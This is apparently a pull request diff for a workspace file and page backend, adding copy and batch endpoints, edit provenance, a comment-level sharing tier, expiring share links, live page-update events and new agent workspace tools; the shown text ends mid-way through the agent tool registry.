### PR TITLE
Agent-native Drive: tool parity, surgical edits, HTML sanitize, copy, provenance, sharing tiers, batch ops, live updates

### DIFF
--- a/backend/main.py
+++ b/backend/main.py
@@ -19,6 +19,7 @@ from .routers import (
     agent_chat,
     aggregate,
     analytics,
+    batch,
     cartridge_invites,
     cartridges,
     collab,
@@ -107,6 +108,7 @@ app.include_router(files_tree.router)
 app.include_router(memory.ws_router)
 app.include_router(tables.ws_router)
 app.include_router(files.ws_router)
+app.include_router(batch.router)
 app.include_router(transcripts.router)
 app.include_router(aggregate.router)
 app.include_router(skill.router)

--- a/backend/migrations/versions/0098_page_edit_provenance.py
+++ b/backend/migrations/versions/0098_page_edit_provenance.py
@@ -1,0 +1,49 @@
+"""Edit provenance for pages — who/which agent session last touched a page.
+
+`pages.last_edit_session_id` / `last_edit_agent_name` answer the page header
+question ("Edited by <agent> in session X") with no join. `page_edits` is an
+append-only log so a future timeline can show more than the latest edit and so
+we can trace a page back to the transcript that produced it. Human edits leave
+the agent/session columns NULL.
+
+Revision ID: 0098
+Revises: 0097
+"""
+
+from alembic import op
+
+revision = "0098"
+down_revision = "0097"
+branch_labels = None
+depends_on = None
+
+
+def upgrade() -> None:
+    op.execute("""
+        ALTER TABLE pages
+            ADD COLUMN last_edit_session_id text,
+            ADD COLUMN last_edit_agent_name text
+        """)
+    op.execute("""
+        CREATE TABLE page_edits (
+            id           uuid PRIMARY KEY DEFAULT gen_random_uuid(),
+            page_id      uuid NOT NULL REFERENCES pages(id) ON DELETE CASCADE,
+            workspace_id uuid NOT NULL REFERENCES workspaces(id) ON DELETE CASCADE,
+            edited_by    uuid REFERENCES users(id),
+            agent_name   text,
+            session_id   text,
+            op           text NOT NULL,
+            created_at   timestamptz NOT NULL DEFAULT now()
+        )
+        """)
+    op.execute("CREATE INDEX idx_page_edits_page ON page_edits (page_id, created_at DESC)")
+    op.execute("CREATE INDEX idx_page_edits_session ON page_edits (workspace_id, session_id)")
+
+
+def downgrade() -> None:
+    op.execute("DROP TABLE IF EXISTS page_edits")
+    op.execute("""
+        ALTER TABLE pages
+            DROP COLUMN IF EXISTS last_edit_session_id,
+            DROP COLUMN IF EXISTS last_edit_agent_name
+        """)

--- a/backend/migrations/versions/0099_share_comment_tier_and_expiry.py
+++ b/backend/migrations/versions/0099_share_comment_tier_and_expiry.py
@@ -1,0 +1,36 @@
+"""Sharing: a 'comment' permission tier + expiring links.
+
+`permission` gains a middle level (read < comment < write), pinned by a CHECK
+constraint. `expires_at` lets a share/invite auto-lapse; NULL means it never
+expires. Existing rows are read/write, already valid; nothing to backfill.
+
+Revision ID: 0099
+Revises: 0098
+"""
+
+from alembic import op
+
+revision = "0099"
+down_revision = "0098"
+branch_labels = None
+depends_on = None
+
+
+def upgrade() -> None:
+    op.execute("ALTER TABLE shares ADD COLUMN expires_at timestamptz")
+    op.execute("ALTER TABLE share_invites ADD COLUMN expires_at timestamptz")
+    op.execute(
+        "ALTER TABLE shares ADD CONSTRAINT shares_permission_chk "
+        "CHECK (permission IN ('read', 'comment', 'write'))"
+    )
+    op.execute(
+        "ALTER TABLE share_invites ADD CONSTRAINT share_invites_permission_chk "
+        "CHECK (permission IN ('read', 'comment', 'write'))"
+    )
+
+
+def downgrade() -> None:
+    op.execute("ALTER TABLE shares DROP CONSTRAINT IF EXISTS shares_permission_chk")
+    op.execute("ALTER TABLE share_invites DROP CONSTRAINT IF EXISTS share_invites_permission_chk")
+    op.execute("ALTER TABLE shares DROP COLUMN IF EXISTS expires_at")
+    op.execute("ALTER TABLE share_invites DROP COLUMN IF EXISTS expires_at")

--- a/backend/models.py
+++ b/backend/models.py
@@ -356,6 +356,13 @@ class PageUpdateRequest(BaseModel):
     move_to_root: bool = False
 
 
+class CopyRequest(BaseModel):
+    """Duplicate a page/folder/file into target_folder_id (defaults to the
+    source's own folder when omitted)."""
+
+    target_folder_id: UUID | None = None
+
+
 class PageResponse(BaseModel):
     id: UUID
     workspace_id: UUID

--- a/backend/models.py
+++ b/backend/models.py
@@ -363,6 +363,21 @@ class CopyRequest(BaseModel):
     target_folder_id: UUID | None = None
 
 
+class BatchItem(BaseModel):
+    object_type: str
+    object_id: UUID
+
+
+class BatchMoveRequest(BaseModel):
+    items: list[BatchItem]
+    target_folder_id: UUID | None = None
+    move_to_root: bool = False
+
+
+class BatchRequest(BaseModel):
+    items: list[BatchItem]
+
+
 class PageResponse(BaseModel):
     id: UUID
     workspace_id: UUID

--- a/backend/models.py
+++ b/backend/models.py
@@ -374,6 +374,8 @@ class PageResponse(BaseModel):
     html_layout: str = "responsive"
     content_hash: str | None = None
     metadata: dict = {}
+    last_edit_session_id: str | None = None
+    last_edit_agent_name: str | None = None
     created_by: UUID
     updated_by: UUID | None
     created_at: datetime

--- a/backend/requirements.txt
+++ b/backend/requirements.txt
@@ -14,6 +14,7 @@ umap-learn>=0.5.0
 python-jose[cryptography]>=3.3.0
 pypdf>=4.0
 anthropic>=0.40.0
+nh3>=0.2
 claude-agent-sdk>=0.1.50
 celery[redis]>=5.4
 redis>=5.0

--- a/backend/routers/batch.py
+++ b/backend/routers/batch.py
@@ -1,0 +1,60 @@
+"""Batch operations: move / soft-delete / restore many tree items at once.
+
+Best-effort — the response reports per-item success and errors, so a partial
+failure (one item the caller can't write) still applies the rest.
+"""
+
+from uuid import UUID
+
+from fastapi import APIRouter, Depends, HTTPException
+
+from ..auth import get_current_user
+from ..models import BatchMoveRequest, BatchRequest
+from ..services import batch_service, workspace_service
+
+router = APIRouter(prefix="/api/v1/workspaces/{workspace_id}/batch", tags=["batch"])
+
+
+async def _check_member(workspace_id: UUID, user_id: UUID) -> None:
+    if not await workspace_service.is_member(workspace_id, user_id):
+        raise HTTPException(status_code=403, detail="Not a workspace member")
+
+
+def _items(req) -> list[dict]:
+    return [{"object_type": i.object_type, "object_id": i.object_id} for i in req.items]
+
+
+@router.post("/move")
+async def batch_move(
+    workspace_id: UUID,
+    req: BatchMoveRequest,
+    current_user: dict = Depends(get_current_user),
+):
+    await _check_member(workspace_id, current_user["id"])
+    return await batch_service.batch_move(
+        workspace_id,
+        current_user["id"],
+        _items(req),
+        target_folder_id=req.target_folder_id,
+        move_to_root=req.move_to_root,
+    )
+
+
+@router.post("/delete")
+async def batch_delete(
+    workspace_id: UUID,
+    req: BatchRequest,
+    current_user: dict = Depends(get_current_user),
+):
+    await _check_member(workspace_id, current_user["id"])
+    return await batch_service.batch_delete(workspace_id, current_user["id"], _items(req))
+
+
+@router.post("/restore")
+async def batch_restore(
+    workspace_id: UUID,
+    req: BatchRequest,
+    current_user: dict = Depends(get_current_user),
+):
+    await _check_member(workspace_id, current_user["id"])
+    return await batch_service.batch_restore(workspace_id, current_user["id"], _items(req))

--- a/backend/routers/cartridges.py
+++ b/backend/routers/cartridges.py
@@ -41,7 +41,6 @@ async def _require_can_share_item(workspace_id: UUID, item, user_id: UUID) -> No
         item.object_id,
         user_id,
         workspace_id=workspace_id,
-        require_write=False,
     )
     if not can_read:
         raise HTTPException(status_code=403, detail="Not allowed to share one or more items")

--- a/backend/routers/collab.py
+++ b/backend/routers/collab.py
@@ -56,7 +56,7 @@ async def authorize_collab_document(
         page_id,
         current_user["id"],
         workspace_id=workspace_id,
-        require_write=True,
+        require="write",
     )
     return CollabAuthorizeResponse(
         user=CollabUser(

--- a/backend/routers/files.py
+++ b/backend/routers/files.py
@@ -19,6 +19,7 @@ from ..auth import get_current_user, get_current_user_optional
 from ..config import settings
 from ..database import get_pool
 from ..models import (
+    CopyRequest,
     FileListResponse,
     FileResponse,
     FileUpdateRequest,
@@ -452,6 +453,43 @@ async def delete_ws_file(
     trashed = await files_service.delete_file(file_id, workspace_id, current_user["id"])
     if not trashed:
         raise HTTPException(status_code=404, detail="File not found")
+
+
+@ws_router.post("/{file_id}/copy", response_model=FileResponse, status_code=201)
+async def copy_ws_file(
+    workspace_id: UUID,
+    file_id: UUID,
+    req: CopyRequest,
+    current_user: dict = Depends(get_current_user),
+):
+    """Duplicate a file (and its S3 blob) as 'Copy of <name>'."""
+    if not await _can_access_file(file_id, workspace_id, current_user["id"]):
+        raise HTTPException(status_code=404, detail="File not found")
+    if req.target_folder_id is not None:
+        can_write_folder = await permission_service.check_access(
+            "folder",
+            req.target_folder_id,
+            current_user["id"],
+            workspace_id=workspace_id,
+            require_write=True,
+        )
+        if not can_write_folder:
+            raise HTTPException(status_code=404, detail="Folder not found")
+    else:
+        await _check_write(workspace_id, current_user["id"])
+    if not storage_service.is_configured():
+        raise HTTPException(status_code=503, detail="File storage is not configured")
+    copied = await files_tree_service.copy_file(
+        file_id, workspace_id, current_user["id"], target_folder_id=req.target_folder_id
+    )
+    if not copied:
+        raise HTTPException(status_code=404, detail="File not found")
+    row = await get_pool().fetchrow(
+        "SELECT id, workspace_id, folder_id, name, content_type, size_bytes, storage_key, "
+        "uploaded_by, created_at, linked_table_id FROM files WHERE id = $1",
+        copied["id"],
+    )
+    return await _file_to_response(dict(row))
 
 
 @ws_router.post("/{file_id}/restore", status_code=204)

--- a/backend/routers/files.py
+++ b/backend/routers/files.py
@@ -72,7 +72,7 @@ async def _can_access_file(
         file_id,
         user_id,
         workspace_id=workspace_id,
-        require_write=require_write,
+        require="write" if require_write else "read",
     ):
         return True
     return False
@@ -471,7 +471,7 @@ async def copy_ws_file(
             req.target_folder_id,
             current_user["id"],
             workspace_id=workspace_id,
-            require_write=True,
+            require="write",
         )
         if not can_write_folder:
             raise HTTPException(status_code=404, detail="Folder not found")

--- a/backend/routers/files_tree.py
+++ b/backend/routers/files_tree.py
@@ -14,6 +14,7 @@ from ..models import (
     CommentThread,
     CommentThreadCreateRequest,
     CommentThreadListResponse,
+    CopyRequest,
     FolderCreateRequest,
     FolderListResponse,
     FolderResponse,
@@ -355,6 +356,33 @@ async def delete_folder(
         raise HTTPException(status_code=404, detail="Folder not found")
 
 
+@router.post("/folders/{folder_id}/copy", response_model=FolderResponse, status_code=201)
+async def copy_folder(
+    workspace_id: UUID,
+    folder_id: UUID,
+    req: CopyRequest,
+    current_user: dict = Depends(get_current_user),
+):
+    await _check_ws_owns_folder(workspace_id, folder_id)
+    await _check_content_access("folder", folder_id, workspace_id, current_user["id"])
+    if req.target_folder_id is not None:
+        await _check_ws_owns_folder(workspace_id, req.target_folder_id)
+        await _check_content_access(
+            "folder", req.target_folder_id, workspace_id, current_user["id"], require_write=True
+        )
+    else:
+        await _check_ws_write(workspace_id, current_user["id"])
+    try:
+        folder = await files_tree_service.copy_folder(
+            folder_id, workspace_id, current_user["id"], target_parent_id=req.target_folder_id
+        )
+    except FolderCycle as e:
+        raise HTTPException(status_code=400, detail=str(e))
+    if not folder:
+        raise HTTPException(status_code=404, detail="Folder not found")
+    return FolderResponse(**folder)
+
+
 # --- Pages ---
 
 
@@ -388,6 +416,29 @@ async def create_page(
         )
     except DuplicatePageName as e:
         raise HTTPException(status_code=409, detail=str(e))
+    return PageResponse(**page)
+
+
+@router.post("/pages/{page_id}/copy", response_model=PageResponse, status_code=201)
+async def copy_page(
+    workspace_id: UUID,
+    page_id: UUID,
+    req: CopyRequest,
+    current_user: dict = Depends(get_current_user),
+):
+    await _check_content_access("page", page_id, workspace_id, current_user["id"])
+    if req.target_folder_id is not None:
+        await _check_ws_owns_folder(workspace_id, req.target_folder_id)
+        await _check_content_access(
+            "folder", req.target_folder_id, workspace_id, current_user["id"], require_write=True
+        )
+    else:
+        await _check_ws_write(workspace_id, current_user["id"])
+    page = await files_tree_service.copy_page(
+        page_id, workspace_id, current_user["id"], target_folder_id=req.target_folder_id
+    )
+    if not page:
+        raise HTTPException(status_code=404, detail="Page not found")
     return PageResponse(**page)
 
 

--- a/backend/routers/files_tree.py
+++ b/backend/routers/files_tree.py
@@ -1,9 +1,12 @@
 """Files router: workspace-scoped folders (nested) and pages."""
 
+import asyncio
+import json
 from urllib.parse import quote
 from uuid import UUID
 
-from fastapi import APIRouter, Depends, HTTPException, Query, Response
+from fastapi import APIRouter, Depends, HTTPException, Query, Request, Response
+from fastapi.responses import StreamingResponse
 
 from ..auth import get_current_user
 from ..database import get_pool
@@ -29,6 +32,7 @@ from ..models import (
 from ..services import (
     comment_service,
     files_tree_service,
+    page_events,
     permission_service,
     workspace_service,
 )
@@ -94,6 +98,43 @@ async def list_workspace_pages(
     await _check_ws_access(workspace_id, current_user["id"])
     rows = await files_tree_service.list_workspace_pages(workspace_id, current_user["id"])
     return WorkspacePageListResponse(pages=[WorkspacePageEntry(**r) for r in rows])
+
+
+# Heartbeat keeps the SSE connection (and intermediaries) alive between edits.
+_PAGE_EVENTS_HEARTBEAT_S = 25
+
+
+@router.get("/pages/events")
+async def page_events_stream(
+    workspace_id: UUID,
+    request: Request,
+    current_user: dict = Depends(get_current_user),
+):
+    """SSE stream of page-update events for the workspace. Open viewers subscribe
+    and refetch the affected page so an agent (or another user) editing it shows
+    up live."""
+    await _check_ws_access(workspace_id, current_user["id"])
+
+    async def event_stream():
+        queue = page_events.subscribe(workspace_id)
+        try:
+            while True:
+                if await request.is_disconnected():
+                    break
+                try:
+                    event = await asyncio.wait_for(queue.get(), timeout=_PAGE_EVENTS_HEARTBEAT_S)
+                except TimeoutError:
+                    yield ": heartbeat\n\n"
+                    continue
+                yield f"data: {json.dumps(event)}\n\n"
+        finally:
+            page_events.unsubscribe(workspace_id, queue)
+
+    return StreamingResponse(
+        event_stream(),
+        media_type="text/event-stream",
+        headers={"Cache-Control": "no-cache", "X-Accel-Buffering": "no"},
+    )
 
 
 # --- Tree (nested folders + pages) ---
@@ -561,13 +602,12 @@ async def update_page(
             html_layout=req.html_layout,
             move_to_root=req.move_to_root,
             guard_content_hash=not (req.collab_projection and req.content is not None),
+            notify=not req.collab_projection,
         )
     except DuplicatePageName as e:
         raise HTTPException(status_code=409, detail=str(e))
     if not page:
         raise HTTPException(status_code=404, detail="Page not found")
-    if req.content is not None and not req.collab_projection:
-        await files_tree_service.delete_page_collab_state(page_id, workspace_id)
     return PageResponse(**page)
 
 

--- a/backend/routers/files_tree.py
+++ b/backend/routers/files_tree.py
@@ -69,14 +69,14 @@ async def _check_content_access(
     workspace_id: UUID,
     user_id: UUID,
     *,
-    require_write: bool = False,
+    require: str = "read",
 ) -> None:
     allowed = await permission_service.check_access(
         object_type,
         object_id,
         user_id,
         workspace_id=workspace_id,
-        require_write=require_write,
+        require=require,
     )
     if allowed:
         return
@@ -137,7 +137,7 @@ async def create_folder(
             req.parent_folder_id,
             workspace_id,
             current_user["id"],
-            require_write=True,
+            require="write",
         )
     try:
         folder = await files_tree_service.create_folder(
@@ -309,7 +309,7 @@ async def update_folder(
         folder_id,
         workspace_id,
         current_user["id"],
-        require_write=True,
+        require="write",
     )
     if req.parent_folder_id is not None and not req.move_to_root:
         await _check_ws_owns_folder(workspace_id, req.parent_folder_id)
@@ -318,7 +318,7 @@ async def update_folder(
             req.parent_folder_id,
             workspace_id,
             current_user["id"],
-            require_write=True,
+            require="write",
         )
     try:
         folder = await files_tree_service.update_folder(
@@ -349,7 +349,7 @@ async def delete_folder(
         folder_id,
         workspace_id,
         current_user["id"],
-        require_write=True,
+        require="write",
     )
     deleted = await files_tree_service.delete_folder(folder_id, workspace_id)
     if not deleted:
@@ -368,7 +368,7 @@ async def copy_folder(
     if req.target_folder_id is not None:
         await _check_ws_owns_folder(workspace_id, req.target_folder_id)
         await _check_content_access(
-            "folder", req.target_folder_id, workspace_id, current_user["id"], require_write=True
+            "folder", req.target_folder_id, workspace_id, current_user["id"], require="write"
         )
     else:
         await _check_ws_write(workspace_id, current_user["id"])
@@ -401,7 +401,7 @@ async def create_page(
             req.folder_id,
             workspace_id,
             current_user["id"],
-            require_write=True,
+            require="write",
         )
     try:
         page = await files_tree_service.create_page(
@@ -430,7 +430,7 @@ async def copy_page(
     if req.target_folder_id is not None:
         await _check_ws_owns_folder(workspace_id, req.target_folder_id)
         await _check_content_access(
-            "folder", req.target_folder_id, workspace_id, current_user["id"], require_write=True
+            "folder", req.target_folder_id, workspace_id, current_user["id"], require="write"
         )
     else:
         await _check_ws_write(workspace_id, current_user["id"])
@@ -536,7 +536,7 @@ async def update_page(
         page_id,
         workspace_id,
         current_user["id"],
-        require_write=True,
+        require="write",
     )
     if req.folder_id is not None and not req.move_to_root:
         await _check_ws_owns_folder(workspace_id, req.folder_id)
@@ -545,7 +545,7 @@ async def update_page(
             req.folder_id,
             workspace_id,
             current_user["id"],
-            require_write=True,
+            require="write",
         )
 
     try:
@@ -582,7 +582,7 @@ async def delete_page(
         page_id,
         workspace_id,
         current_user["id"],
-        require_write=True,
+        require="write",
     )
     deleted = await files_tree_service.delete_page(page_id, workspace_id, current_user["id"])
     if not deleted:
@@ -596,7 +596,7 @@ async def restore_page(
     current_user: dict = Depends(get_current_user),
 ):
     await _check_content_access(
-        "page", page_id, workspace_id, current_user["id"], require_write=True
+        "page", page_id, workspace_id, current_user["id"], require="write"
     )
     restored = await files_tree_service.restore_page(page_id, workspace_id)
     if not restored:
@@ -611,7 +611,7 @@ async def purge_page(
 ):
     """Permanent delete — only callable on a page already in trash."""
     await _check_content_access(
-        "page", page_id, workspace_id, current_user["id"], require_write=True
+        "page", page_id, workspace_id, current_user["id"], require="write"
     )
     purged = await files_tree_service.purge_page(page_id, workspace_id)
     if not purged:
@@ -658,8 +658,11 @@ async def create_comment_thread(
     req: CommentThreadCreateRequest,
     current_user: dict = Depends(get_current_user),
 ):
-    # Comments are read-level permission — any workspace member can comment.
-    await _check_content_access("page", page_id, workspace_id, current_user["id"])
+    # Commenting needs at least the 'comment' share level (workspace members
+    # always qualify); a plain read-only share can view but not comment.
+    await _check_content_access(
+        "page", page_id, workspace_id, current_user["id"], require="comment"
+    )
     await _check_page_in_workspace(workspace_id, page_id)
     thread = await comment_service.create_thread(
         page_id,
@@ -684,7 +687,9 @@ async def reply_to_thread(
     req: CommentReplyRequest,
     current_user: dict = Depends(get_current_user),
 ):
-    await _check_content_access("page", page_id, workspace_id, current_user["id"])
+    await _check_content_access(
+        "page", page_id, workspace_id, current_user["id"], require="comment"
+    )
     await _check_page_in_workspace(workspace_id, page_id)
     thread = await comment_service.add_reply(thread_id, body=req.body, author_id=current_user["id"])
     if thread is None:
@@ -778,7 +783,7 @@ async def reconcile_comment_anchors(
     """
     await _check_ws_write(workspace_id, current_user["id"])
     await _check_content_access(
-        "page", page_id, workspace_id, current_user["id"], require_write=True
+        "page", page_id, workspace_id, current_user["id"], require="write"
     )
     await _check_page_in_workspace(workspace_id, page_id)
     await comment_service.reconcile_orphans(page_id, req.present_ids)

--- a/backend/routers/files_tree.py
+++ b/backend/routers/files_tree.py
@@ -635,9 +635,7 @@ async def restore_page(
     page_id: UUID,
     current_user: dict = Depends(get_current_user),
 ):
-    await _check_content_access(
-        "page", page_id, workspace_id, current_user["id"], require="write"
-    )
+    await _check_content_access("page", page_id, workspace_id, current_user["id"], require="write")
     restored = await files_tree_service.restore_page(page_id, workspace_id)
     if not restored:
         raise HTTPException(status_code=404, detail="Page not in trash")
@@ -650,9 +648,7 @@ async def purge_page(
     current_user: dict = Depends(get_current_user),
 ):
     """Permanent delete — only callable on a page already in trash."""
-    await _check_content_access(
-        "page", page_id, workspace_id, current_user["id"], require="write"
-    )
+    await _check_content_access("page", page_id, workspace_id, current_user["id"], require="write")
     purged = await files_tree_service.purge_page(page_id, workspace_id)
     if not purged:
         raise HTTPException(status_code=404, detail="Page not in trash")
@@ -822,8 +818,6 @@ async def reconcile_comment_anchors(
     Resolved threads are left alone.
     """
     await _check_ws_write(workspace_id, current_user["id"])
-    await _check_content_access(
-        "page", page_id, workspace_id, current_user["id"], require="write"
-    )
+    await _check_content_access("page", page_id, workspace_id, current_user["id"], require="write")
     await _check_page_in_workspace(workspace_id, page_id)
     await comment_service.reconcile_orphans(page_id, req.present_ids)

--- a/backend/routers/sessions.py
+++ b/backend/routers/sessions.py
@@ -263,7 +263,7 @@ async def rename_workspace_session(
         session["id"],
         current_user["id"],
         workspace_id=workspace_id,
-        require_write=True,
+        require="write",
     )
     if not can_write:
         raise HTTPException(status_code=404, detail="Session not found")
@@ -297,7 +297,7 @@ async def _check_session_write(
         session_row_id,
         user_id,
         workspace_id=workspace_id,
-        require_write=True,
+        require="write",
     )
     if not can_write:
         raise HTTPException(status_code=404, detail="Session not found")

--- a/backend/routers/shares.py
+++ b/backend/routers/shares.py
@@ -6,6 +6,7 @@ to a cartridge (the cartridge-principal share) is handled on the cartridge route
 
 from __future__ import annotations
 
+from datetime import datetime
 from uuid import UUID
 
 from fastapi import APIRouter, Depends
@@ -22,6 +23,7 @@ class ShareRequest(BaseModel):
     object_id: UUID
     email: str
     permission: str = "read"
+    expires_at: datetime | None = None
 
 
 class UnshareRequest(BaseModel):
@@ -39,6 +41,7 @@ async def create_share(req: ShareRequest, current_user: dict = Depends(get_curre
         email=req.email,
         permission=req.permission,
         owner_id=current_user["id"],
+        expires_at=req.expires_at,
     )
 
 

--- a/backend/routers/tables.py
+++ b/backend/routers/tables.py
@@ -80,7 +80,7 @@ async def _check_table_access(
         table_id,
         user_id,
         workspace_id=workspace_id,
-        require_write=require_write,
+        require="write" if require_write else "read",
     )
     if allowed:
         return

--- a/backend/services/agent_runtime.py
+++ b/backend/services/agent_runtime.py
@@ -736,11 +736,307 @@ async def _update_page(args: dict) -> dict:
     return _text_result(json.dumps({"id": str(page["id"]), "name": page["name"]}))
 
 
+@tool(
+    "edit_page",
+    "Make a surgical edit to a page body instead of rewriting it whole. In "
+    "'replace' mode `old_string` must appear exactly once in the page (it is "
+    "replaced with `new_string`); in 'append' mode `new_string` is added to the "
+    "end. Edits the active content (markdown or html) of the page.",
+    {
+        "type": "object",
+        "properties": {
+            "page_id": {"type": "string"},
+            "old_string": {"type": "string", "default": ""},
+            "new_string": {"type": "string"},
+            "mode": {"type": "string", "enum": ["replace", "append"], "default": "replace"},
+        },
+        "required": ["page_id", "new_string"],
+    },
+)
+async def _edit_page(args: dict) -> dict:
+    workspace_id = _current_workspace()
+    user_id = _current_user()
+    try:
+        page = await files_tree_service.edit_page(
+            page_id=UUID(args["page_id"]),
+            workspace_id=workspace_id,
+            updated_by=user_id,
+            old_string=args.get("old_string") or "",
+            new_string=args["new_string"],
+            mode=args.get("mode") or "replace",
+        )
+    except files_tree_service.EditMatchError as e:
+        return _text_result(
+            json.dumps(
+                {
+                    "error": "no-unique-match",
+                    "detail": f"old_string matched {e.count} times; it must match exactly once",
+                }
+            )
+        )
+    except files_tree_service.ConcurrentEditError:
+        return _text_result(json.dumps({"error": "page changed during edit, read it and retry"}))
+    if page is None:
+        return _text_result(json.dumps({"error": "page not found"}))
+    return _text_result(json.dumps({"id": str(page["id"]), "name": page["name"]}))
+
+
+# --- Tree mutation tools (folders, pages, tables) --------------------------
+#
+# These wrap the same service functions the REST/MCP layer uses, so the in-app
+# agent can organize the workspace, not just write page bodies. Operations on an
+# existing object by id are workspace-scoped by the service WHERE clause (pages)
+# or by an explicit guard (tables, which the service does not scope).
+
+
+async def _table_in_workspace(table_id: UUID, workspace_id: UUID) -> bool:
+    meta = await table_service.get_table_metadata(table_id)
+    return bool(meta and meta["workspace_id"] == workspace_id)
+
+
+@tool(
+    "create_folder",
+    "Create a folder in the workspace. Pass parent_folder_id to nest it.",
+    {
+        "type": "object",
+        "properties": {
+            "name": {"type": "string"},
+            "parent_folder_id": {"type": "string"},
+        },
+        "required": ["name"],
+    },
+)
+async def _create_folder(args: dict) -> dict:
+    workspace_id = _current_workspace()
+    user_id = _current_user()
+    parent_folder_id = UUID(args["parent_folder_id"]) if args.get("parent_folder_id") else None
+    try:
+        folder = await files_tree_service.create_folder(
+            workspace_id, args["name"], user_id, parent_folder_id=parent_folder_id
+        )
+    except files_tree_service.DuplicateFolderName:
+        return _text_result(json.dumps({"error": "a folder with that name already exists here"}))
+    except ValueError as e:
+        return _text_result(json.dumps({"error": str(e)}))
+    return _text_result(json.dumps({"id": str(folder["id"]), "name": folder["name"]}))
+
+
+@tool(
+    "move_page",
+    "Move a page into a folder, or to the workspace root with move_to_root.",
+    {
+        "type": "object",
+        "properties": {
+            "page_id": {"type": "string"},
+            "folder_id": {"type": "string"},
+            "move_to_root": {"type": "boolean", "default": False},
+        },
+        "required": ["page_id"],
+    },
+)
+async def _move_page(args: dict) -> dict:
+    workspace_id = _current_workspace()
+    user_id = _current_user()
+    folder_id = UUID(args["folder_id"]) if args.get("folder_id") else None
+    try:
+        page = await files_tree_service.update_page(
+            page_id=UUID(args["page_id"]),
+            workspace_id=workspace_id,
+            updated_by=user_id,
+            folder_id=folder_id,
+            move_to_root=bool(args.get("move_to_root", False)),
+        )
+    except ValueError as e:
+        return _text_result(json.dumps({"error": str(e)}))
+    if page is None:
+        return _text_result(json.dumps({"error": "page not found"}))
+    return _text_result(json.dumps({"id": str(page["id"]), "name": page["name"]}))
+
+
+@tool(
+    "rename_page",
+    "Rename a page by id.",
+    {
+        "type": "object",
+        "properties": {"page_id": {"type": "string"}, "name": {"type": "string"}},
+        "required": ["page_id", "name"],
+    },
+)
+async def _rename_page(args: dict) -> dict:
+    workspace_id = _current_workspace()
+    user_id = _current_user()
+    try:
+        page = await files_tree_service.update_page(
+            page_id=UUID(args["page_id"]),
+            workspace_id=workspace_id,
+            updated_by=user_id,
+            name=args["name"],
+        )
+    except files_tree_service.DuplicatePageName:
+        return _text_result(json.dumps({"error": "a page with that name already exists here"}))
+    if page is None:
+        return _text_result(json.dumps({"error": "page not found"}))
+    return _text_result(json.dumps({"id": str(page["id"]), "name": page["name"]}))
+
+
+@tool(
+    "delete_page",
+    "Move a page to the trash (soft delete) by id.",
+    {
+        "type": "object",
+        "properties": {"page_id": {"type": "string"}},
+        "required": ["page_id"],
+    },
+)
+async def _delete_page(args: dict) -> dict:
+    workspace_id = _current_workspace()
+    user_id = _current_user()
+    deleted = await files_tree_service.delete_page(UUID(args["page_id"]), workspace_id, user_id)
+    if not deleted:
+        return _text_result(json.dumps({"error": "page not found"}))
+    return _text_result(json.dumps({"deleted": True, "page_id": args["page_id"]}))
+
+
+@tool(
+    "create_table",
+    "Create a table. `columns` is a list of {name, type} column definitions "
+    "(type one of text, number, boolean, date, datetime, url, email, select, "
+    "multiselect, json). Pass folder_id to place it in a folder.",
+    {
+        "type": "object",
+        "properties": {
+            "name": {"type": "string"},
+            "description": {"type": "string", "default": ""},
+            "columns": {"type": "array", "items": {"type": "object"}, "default": []},
+            "folder_id": {"type": "string"},
+        },
+        "required": ["name"],
+    },
+)
+async def _create_table(args: dict) -> dict:
+    workspace_id = _current_workspace()
+    user_id = _current_user()
+    folder_id = UUID(args["folder_id"]) if args.get("folder_id") else None
+    try:
+        table = await table_service.create_table(
+            workspace_id,
+            args["name"],
+            args.get("description") or "",
+            args.get("columns") or [],
+            user_id,
+            folder_id=folder_id,
+        )
+    except ValueError as e:
+        return _text_result(json.dumps({"error": str(e)}))
+    return _text_result(json.dumps({"id": str(table["id"]), "name": table["name"]}))
+
+
+@tool(
+    "insert_row",
+    "Insert a row into a table. `data` maps column id/name to value.",
+    {
+        "type": "object",
+        "properties": {
+            "table_id": {"type": "string"},
+            "data": {"type": "object"},
+        },
+        "required": ["table_id", "data"],
+    },
+)
+async def _insert_row(args: dict) -> dict:
+    workspace_id = _current_workspace()
+    table_id = UUID(args["table_id"])
+    if not await _table_in_workspace(table_id, workspace_id):
+        return _text_result(json.dumps({"error": "table not found"}))
+    row = await table_service.create_row(table_id, args.get("data") or {}, _current_user())
+    return _text_result(json.dumps({"id": str(row["id"])}))
+
+
+@tool(
+    "update_row",
+    "Update a table row (partial merge — only the keys you pass change).",
+    {
+        "type": "object",
+        "properties": {
+            "table_id": {"type": "string"},
+            "row_id": {"type": "string"},
+            "data": {"type": "object"},
+        },
+        "required": ["table_id", "row_id", "data"],
+    },
+)
+async def _update_row(args: dict) -> dict:
+    workspace_id = _current_workspace()
+    table_id = UUID(args["table_id"])
+    if not await _table_in_workspace(table_id, workspace_id):
+        return _text_result(json.dumps({"error": "table not found"}))
+    row = await table_service.update_row(
+        UUID(args["row_id"]), args.get("data") or {}, _current_user(), table_id=table_id
+    )
+    if row is None:
+        return _text_result(json.dumps({"error": "row not found"}))
+    return _text_result(json.dumps({"id": str(row["id"])}))
+
+
+@tool(
+    "add_column",
+    "Add a column to a table. `column` is a {name, type} definition.",
+    {
+        "type": "object",
+        "properties": {
+            "table_id": {"type": "string"},
+            "column": {"type": "object"},
+        },
+        "required": ["table_id", "column"],
+    },
+)
+async def _add_column(args: dict) -> dict:
+    workspace_id = _current_workspace()
+    table_id = UUID(args["table_id"])
+    if not await _table_in_workspace(table_id, workspace_id):
+        return _text_result(json.dumps({"error": "table not found"}))
+    table = await table_service.add_column(table_id, args.get("column") or {}, _current_user())
+    return _text_result(json.dumps({"id": str(table["id"]), "name": table["name"]}))
+
+
+@tool(
+    "delete_row",
+    "Delete a row from a table by id.",
+    {
+        "type": "object",
+        "properties": {
+            "table_id": {"type": "string"},
+            "row_id": {"type": "string"},
+        },
+        "required": ["table_id", "row_id"],
+    },
+)
+async def _delete_row(args: dict) -> dict:
+    workspace_id = _current_workspace()
+    table_id = UUID(args["table_id"])
+    if not await _table_in_workspace(table_id, workspace_id):
+        return _text_result(json.dumps({"error": "table not found"}))
+    deleted = await table_service.delete_row(UUID(args["row_id"]), table_id=table_id)
+    if not deleted:
+        return _text_result(json.dumps({"error": "row not found"}))
+    return _text_result(json.dumps({"deleted": True, "row_id": args["row_id"]}))
+
+
 _TOOLS_BY_NAME = {
     "search_history": _search_history,
     "read_page": _read_page,
     "create_page": _create_page,
     "update_page": _update_page,
+    "edit_page": _edit_page,
+    "create_folder": _create_folder,
+    "move_page": _move_page,
